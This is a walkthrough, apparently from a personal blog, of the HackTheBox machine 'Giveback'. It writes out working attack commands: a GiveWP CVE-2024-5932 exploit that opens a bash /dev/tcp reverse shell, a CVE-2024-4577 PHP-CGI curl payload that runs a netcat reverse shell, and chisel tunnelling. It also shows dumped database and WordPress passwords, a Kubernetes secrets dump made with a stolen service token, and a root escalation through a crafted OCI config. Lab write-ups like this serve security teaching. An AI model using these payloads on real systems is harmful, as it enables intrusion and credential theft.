File Nº 0x6D / Subject: m0rgxn
Local --:--:--
← All writeupsCase 03 · Filed 13 Jan 2026 · HackTheBox · 4 min read

Giveback

Rooted

Creative attack chain to get user


Evidence photo — case 03
This machine is a superb, multi-layered, and modern infrastructure challenge. Its difficulty and realism don't come from a single, complex vulnerability but from its chained attack path. It also involved a lot of pivoting. As usual the output of the nmap scan
Bash
Nmap scan report for giveback.htb (10.10.11.94)
Host is up (0.86s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 66f89c58f4b859bdcdec9224c3978e9e (ECDSA)
|_  256 96318a821a659f0aa26cff4d447cd394 (ED25519)
80/tcp open  http    nginx 1.28.0
|_http-server-header: nginx/1.28.0
|_http-generator: WordPress 6.8.1
|_http-title: GIVING BACK IS WHAT MATTERS MOST – OBVI
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/

We can see that we are dealing with a WordPress application, so we should be looking for vulnerable versions for used plugins. Let’s first see what’s on the website
We can see that it’s a donation platform. And on the second picture we can see that the admin left a note, and we can understand that the application is still in production. After further enumerating the plugins that were available on the WordPress app, I tried enumerating different directories using wpscan tool and i found out that the directory where donations were being handled which is /donations/the-things-we-need/ has a vulnerable plugin which was GiveWP v3.14.0 . We can check this also from the HTML source code of the page
Bash
var give_global_vars = { ... "give_version":"3.14.0" ... }
https://github.com/EQSTLab/CVE-2024-5932?tab=readme-ov-file I did a quick search of the known vulnerabilities for that version and managed to get a reverse shell on the docker container where the wordpress application was running. I used the following command to do so:
Bash
[Nov 03, 2025 - 17:55:06 (CET)] exegol-D3xt3R CVE-2024-5932 # python CVE-2024-5932-rce.py -u "http://giveback.htb/donations/the-things-we-need" -c 'bash -c "/bin/bash -i >& /dev/tcp/IP/PORT 0>&1"'

These were all the environmental variables for the WordPress pod which dumped all the docker’s secrets.
Bash
BETA_VINO_WP_MARIADB_SERVICE_PORT=3306
KUBERNETES_SERVICE_PORT_HTTPS=443
WORDPRESS_SMTP_PASSWORD=
WORDPRESS_SMTP_FROM_EMAIL=
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PORT=443
WEB_SERVER_HTTP_PORT_NUMBER=8080
WORDPRESS_RESET_DATA_PERMISSIONS=no
KUBERNETES_SERVICE_PORT=443
WORDPRESS_EMAIL=user@example.com
WP_CLI_CONF_FILE=/opt/bitnami/wp-cli/conf/wp-cli.yml
WORDPRESS_DATABASE_HOST=beta-vino-wp-mariadb
MARIADB_PORT_NUMBER=3306
MODULE=wordpress
WORDPRESS_SMTP_FROM_NAME=FirstName LastName
HOSTNAME=beta-vino-wp-wordpress-6f96685b7d-nb7cw
WORDPRESS_SMTP_PORT_NUMBER=
BETA_VINO_WP_MARIADB_PORT_3306_TCP_PROTO=tcp
WORDPRESS_EXTRA_CLI_ARGS=
APACHE_BASE_DIR=/opt/bitnami/apache
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PORT=5000
APACHE_VHOSTS_DIR=/opt/bitnami/apache/conf/vhosts
WEB_SERVER_DEFAULT_HTTP_PORT_NUMBER=8080
WP_NGINX_SERVICE_PORT_80_TCP=tcp://10.43.4.242:80
WORDPRESS_ENABLE_DATABASE_SSL=no
WP_NGINX_SERVICE_PORT_80_TCP_PROTO=tcp
APACHE_DAEMON_USER=daemon
BITNAMI_ROOT_DIR=/opt/bitnami
LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241
WORDPRESS_BASE_DIR=/opt/bitnami/wordpress
WORDPRESS_SCHEME=http
WORDPRESS_LOGGED_IN_SALT=
BETA_VINO_WP_WORDPRESS_PORT_80_TCP=tcp://10.43.61.204:80
WORDPRESS_DATA_TO_PERSIST=wp-config.php wp-content
WORDPRESS_HTACCESS_OVERRIDE_NONE=no
WORDPRESS_DATABASE_SSL_CERT_FILE=
APACHE_HTTPS_PORT_NUMBER=8443
PWD=/opt/bitnami/wordpress
OS_FLAVOUR=debian-12
WORDPRESS_SMTP_PROTOCOL=
WORDPRESS_CONF_FILE=/opt/bitnami/wordpress/wp-config.php
LEGACY_INTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000
WP_CLI_BASE_DIR=/opt/bitnami/wp-cli
WORDPRESS_VOLUME_DIR=/bitnami/wordpress
WP_CLI_CONF_DIR=/opt/bitnami/wp-cli/conf
APACHE_BIN_DIR=/opt/bitnami/apache/bin
BETA_VINO_WP_MARIADB_SERVICE_PORT_MYSQL=3306
WORDPRESS_PLUGINS=none
WORDPRESS_FIRST_NAME=FirstName
MARIADB_HOST=beta-vino-wp-mariadb
WORDPRESS_EXTRA_WP_CONFIG_CONTENT=
WORDPRESS_MULTISITE_ENABLE_NIP_IO_REDIRECTION=no
WORDPRESS_DATABASE_USER=bn_wordpress
PHP_DEFAULT_UPLOAD_MAX_FILESIZE=80M
WORDPRESS_AUTH_KEY=
BETA_VINO_WP_MARIADB_PORT_3306_TCP=tcp://10.43.147.82:3306
WORDPRESS_MULTISITE_NETWORK_TYPE=subdomain
APACHE_DEFAULT_CONF_DIR=/opt/bitnami/apache/conf.default
WORDPRESS_DATABASE_SSL_KEY_FILE=
WORDPRESS_LOGGED_IN_KEY=
APACHE_CONF_DIR=/opt/bitnami/apache/conf
HOME=/
KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443
WEB_SERVER_DAEMON_GROUP=daemon
PHP_DEFAULT_POST_MAX_SIZE=80M
WORDPRESS_ENABLE_HTTPS=no
BETA_VINO_WP_WORDPRESS_SERVICE_PORT=80
BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTPS=443
WORDPRESS_TABLE_PREFIX=wp_
WORDPRESS_DATABASE_PORT_NUMBER=3306
WORDPRESS_DATABASE_NAME=bitnami_wordpress
LEGACY_INTRANET_SERVICE_SERVICE_PORT_HTTP=5000
APACHE_HTTP_PORT_NUMBER=8080
WP_NGINX_SERVICE_SERVICE_HOST=10.43.4.242
WP_NGINX_SERVICE_PORT=tcp://10.43.4.242:80
WP_CLI_DAEMON_GROUP=daemon
APACHE_DEFAULT_HTTP_PORT_NUMBER=8080
BETA_VINO_WP_MARIADB_PORT=tcp://10.43.147.82:3306
WORDPRESS_MULTISITE_FILEUPLOAD_MAXK=81920
WORDPRESS_AUTO_UPDATE_LEVEL=none
BITNAMI_DEBUG=false
LEGACY_INTRANET_SERVICE_SERVICE_PORT=5000
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_ADDR=10.43.2.241
WORDPRESS_USERNAME=user
BETA_VINO_WP_WORDPRESS_PORT=tcp://10.43.61.204:80
WORDPRESS_ENABLE_XML_RPC=no
WORDPRESS_BLOG_NAME=User's Blog!
WP_NGINX_SERVICE_PORT_80_TCP_ADDR=10.43.4.242
APACHE_PID_FILE=/opt/bitnami/apache/var/run/httpd.pid
WORDPRESS_AUTH_SALT=
APACHE_LOGS_DIR=/opt/bitnami/apache/logs
WORDPRESS_EXTRA_INSTALL_ARGS=
BETA_VINO_WP_MARIADB_PORT_3306_TCP_PORT=3306
APACHE_DAEMON_GROUP=daemon
WORDPRESS_NONCE_KEY=
WEB_SERVER_HTTPS_PORT_NUMBER=8443
WORDPRESS_SMTP_HOST=
WP_NGINX_SERVICE_SERVICE_PORT_HTTP=80
WORDPRESS_NONCE_SALT=
APACHE_DEFAULT_HTTPS_PORT_NUMBER=8443
APACHE_CONF_FILE=/opt/bitnami/apache/conf/httpd.conf
WORDPRESS_MULTISITE_EXTERNAL_HTTP_PORT_NUMBER=80
BETA_VINO_WP_WORDPRESS_PORT_443_TCP=tcp://10.43.61.204:443
WEB_SERVER_DEFAULT_HTTPS_PORT_NUMBER=8443
WP_NGINX_SERVICE_SERVICE_PORT=80
WORDPRESS_LAST_NAME=LastName
WP_NGINX_SERVICE_PORT_80_TCP_PORT=80
WORDPRESS_ENABLE_MULTISITE=no
WORDPRESS_SKIP_BOOTSTRAP=no
WORDPRESS_MULTISITE_EXTERNAL_HTTPS_PORT_NUMBER=443
SHLVL=2
WORDPRESS_SECURE_AUTH_SALT=
BITNAMI_VOLUME_DIR=/bitnami
BETA_VINO_WP_MARIADB_PORT_3306_TCP_ADDR=10.43.147.82
BETA_VINO_WP_WORDPRESS_PORT_80_TCP_PORT=80
KUBERNETES_PORT_443_TCP_PROTO=tcp
BITNAMI_APP_NAME=wordpress
WORDPRESS_DATABASE_PASSWORD=sW5sp4spa3u7RLyetrekE4oS
APACHE_HTDOCS_DIR=/opt/bitnami/apache/htdocs
BETA_VINO_WP_WORDPRESS_SERVICE_HOST=10.43.61.204
WEB_SERVER_GROUP=daemon
WORDPRESS_PASSWORD=O8F7KR5zGi
KUBERNETES_PORT_443_TCP_ADDR=10.43.0.1
APACHE_HTACCESS_DIR=/opt/bitnami/apache/conf/vhosts/htaccess
WORDPRESS_DEFAULT_DATABASE_HOST=mariadb
WORDPRESS_SECURE_AUTH_KEY=
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PROTO=tcp
APACHE_TMP_DIR=/opt/bitnami/apache/var/run
APP_VERSION=6.8.1
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_ADDR=10.43.61.204
ALLOW_EMPTY_PASSWORD=yes
WP_CLI_DAEMON_USER=daemon
BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTP=80
KUBERNETES_SERVICE_HOST=10.43.0.1
KUBERNETES_PORT=tcp://10.43.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
WP_CLI_BIN_DIR=/opt/bitnami/wp-cli/bin
WORDPRESS_VERIFY_DATABASE_SSL=yes
OS_NAME=linux
BETA_VINO_WP_WORDPRESS_PORT_80_TCP_PROTO=tcp
APACHE_SERVER_TOKENS=Prod
PATH=/opt/bitnami/apache/bin:/opt/bitnami/common/bin:/opt/bitnami/common/bin:/opt/bitnami/mysql/bin:/opt/bitnami/common/bin:/opt/bitnami/php/bin:/opt/bitnami/php/sbin:/opt/bitnami/apache/bin:/opt/bitnami/mysql/bin:/opt/bitnami/wp-cli/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PROTO=tcp
WORDPRESS_ENABLE_HTACCESS_PERSISTENCE=no
WORDPRESS_ENABLE_REVERSE_PROXY=no
LEGACY_INTRANET_SERVICE_PORT=tcp://10.43.2.241:5000
WORDPRESS_SMTP_USER=
WEB_SERVER_TYPE=apache
WORDPRESS_MULTISITE_HOST=
PHP_DEFAULT_MEMORY_LIMIT=512M
WORDPRESS_OVERRIDE_DATABASE_SETTINGS=no
WORDPRESS_DATABASE_The SSL_CA_FILE=
WEB_SERVER_DAEMON_USER=daemon
OS_ARCH=amd64
BETA_VINO_WP_WORDPRESS_PORT_80_TCP_ADDR=10.43.61.204
BETA_VINO_WP_MARIADB_SERVICE_HOST=10.43.147.82
_=/usr/bin/env
OLDPWD=/opt/bitnami

Unfortunately this pod didn’t have the /var/run/secrets/kubernetes.io directory, meaning I don’t yet have the token for the K8s API to potentially dump ssh creds. Let’s see what we can do in this particular docker. Let’s take a look at the env variables one more time, we can see that there is another service/pod running.
Bash
LEGACY_INTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000
...
LEGACY_INTRANET_SERVICE_SERVICE_PORT_HTTP=5000
I port forwarded the service using chisel.
Bash
I have no name!@beta-vino-wp-wordpress-6f96685b7d-nb7cw:/tmp$ ./chisel client 10.10.16.160:9001 R:5000:10.43.2.241:5000
<el client 10.10.16.160:9001 R:5000:10.43.2.241:5000          
2025/11/03 17:38:22 client: Connecting to ws://10.10.16.160:9001
2025/11/03 17:38:32 client: Connected (Latency 2.183441672s)

Bash
[Nov 03, 2025 - 18:33:16 (CET)] exegol-D3xt3R /workspace # chisel server -p 9001 --reverse 
2025/11/03 18:34:49 server: Reverse tunnelling enabled
2025/11/03 18:34:49 server: Fingerprint nXIa/JK8QnaUZnddHx3oNTIpB6PUk3CfJbjgnyJKi1Q=
2025/11/03 18:34:49 server: Listening on http://0.0.0.0:9001
2025/11/03 18:37:56 server: session#1: Client version (1.11.3) differs from server version (0.0.0-src)
2025/11/03 18:37:56 server: session#1: tun: proxy#R:5000=>10.43.2.241:5000: Listening

This is what I found on the forwarded HTTP port.
Most of the links present here either returned a 404 status (since the app is still in production as mentioned before) or 403. I couldn’t read the /phpinfo.php file but what caught my attention was the developer note left here as well as the legacy notice at the top. After a quick search about PHP-CGI (Common Gateway Interface) it turned out that it’s a binary that runs php code, it’s basically a “php interpreter” of some sorts that is used to execute the app’s php code. I searched online for vulnerabilities related to PHP-CGI, and found out that it was vulnerable to Argument Injection in this CVE-2024-4577 . This vulnerability was only present for windows systems and considering the note left by the developer we can say that we identified the correct CVE. I tried this request to confirm the RCE and get the php version that i found in the link below. It has deep explication of the whole payload for who’s interested. No Way, PHP Strikes Again! (CVE-2024-4577)
We can clearly see that the RCE worked and we got the php version and as expected it’s vulnerable to the CVE we’re trying. This was the payload that got me a reverse shell on the CMS pod.
Bash
[Nov 03, 2025 - 21:53:29 (CET)] exegol-D3xt3R linux # curl "http://127.0.0.1:5000/cgi-bin/php-cgi?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input" -d "nc 10.10.16.160 4444 -e sh"

After getting the shell we can navigate to the /var/run/kubernetes.io and get the token and then use it to connect to the Kubernets API Server which we found the IP and port earlier in the env variables KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443.
Bash
php -r '$token = "eyJhbGciOiJSUzI1NiIsImt...[...THE REST OF YOUR VERY LONG TOKEN...]...JHM7wIg"; $ctx = stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false],"http"=>["header"=>"Authorization: Bearer " . $token]]); echo file_get_contents("https://10.43.0.1:443/api/v1/namespaces/default/secrets", false, $ctx);'
We’re left with EVERYTHING!
Bash
    ...

      "metadata": {
        "name": "user-secret-babywyrm",
        "namespace": "default",
        "uid": "6d150a1f-d43b-4d07-9d73-213e54b78f12",
        "resourceVersion": "2855781",
        "creationTimestamp": "2025-11-03T21:38:04Z",
        "ownerReferences": [
          {
            "apiVersion": "bitnami.com/v1alpha1",
            "kind": "SealedSecret",
            "name": "user-secret-babywyrm",
            "uid": "c42f3410-77bb-4d60-8f7a-acebfe105b99",
            "controller": true
          }
        ],
        "managedFields": [
          {
            "manager": "controller",
            "operation": "Update",
            "apiVersion": "v1",
            "time": "2025-11-03T21:38:04Z",
            "fieldsType": "FieldsV1",
            "fieldsV1": {
              "f:data": {
                ".": {},
                "f:MASTERPASS": {}
              },
              "f:metadata": {
                "f:ownerReferences": {
                  ".": {},
                  "k:{\"uid\":\"c42f3410-77bb-4d60-8f7a-acebfe105b99\"}": {}
                }
              },
              "f:type": {}
            }
          }
        ]
      },
      "data": {
        **"MASTERPASS": "U3FSSmNCUG15bVlabkFCaU5xUks1VkU1c092eThpZw=="**
      },
      "type": "Opaque"
    }   
    
    
    
    
    ...
The output was very long and so i just selected the part that we’ll be using, the server hold a lot of usernames that were distracting 👀, but this is the one that we saw before in the wordpress application and it’s likely that it’s the right user. The naming convention for Kubernetes is the following user-secret-[USERNAME] . The password was base64 encoded also, we have to decode it first. And finally connect using ssh and the credentials that we found.
Let’s run sudo -l first to see if we can run anything with sudo privileges
Interesting, let’s see what’s up with the binary that we found
The binary asks for a password, and I’ve seen that the author talked about a password-reuse vulnerability for this binary in HackTheBox discord. I tried all the passwords that I found on Kubernetes secrets file and the password that worked was the mariadb-password one.
If we run the binary with that password we can see what the binary is, it turned out that it’s used for maintaining the docker containers ( at least that what i know for now ) The version of the binary
Bash
babywyrm@giveback:/tmp$ cd pwn
babywyrm@giveback:/tmp/pwn$ cat << EOF > config.json
{
  "ociVersion": "1.0.2",
  "process": {
    "user": {"uid": 0, "gid": 0},
    "args": ["/bin/cat", "/root/root.txt"],
    "cwd": "/",
    "env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],
    "terminal": false
  },
  "root": {"path": "rootfs"},
  "mounts": [
    {"destination": "/proc", "type": "proc", "source": "proc"},
    {"destination": "/dev", "type": "tmpfs", "source": "tmpfs", "options": ["nosuid","strictatime","mode=755","size=65536k"]},
    {"destination": "/bin", "type": "bind", "source": "/bin", "options": ["bind","ro"]},
    {"destination": "/lib", "type": "bind", "source": "/lib", "options": ["bind","ro"]},
    {"destination": "/lib64", "type": "bind", "source": "/lib64", "options": ["bind","ro"]},
    {"destination": "/root", "type": "bind", "source": "/root", "options": ["bind","ro"]},
    {"destination": "/usr", "type": "bind", "source": "/usr", "options": ["bind","ro"]}
  ],
  "linux": {
    "namespaces": [
      {"type": "pid"},
      {"type": "network"},
      {"type": "ipc"},
      {"type": "uts"},
      {"type": "mount"}
    ]
  }
}
EOF
babywyrm@giveback:/tmp/pwn$ mkdir rootfs
babywyrm@giveback:/tmp/pwn$ sudo /opt/debug run pwn
Validating sudo...
Please enter the administrative password: 

Both passwords verified. Executing the command...
<root flag here>
As always, Happy pwning! The root is very disappointing to a box so gooood up until user. It just illustrates password reuse for a binary with sudo privs.
§ Contents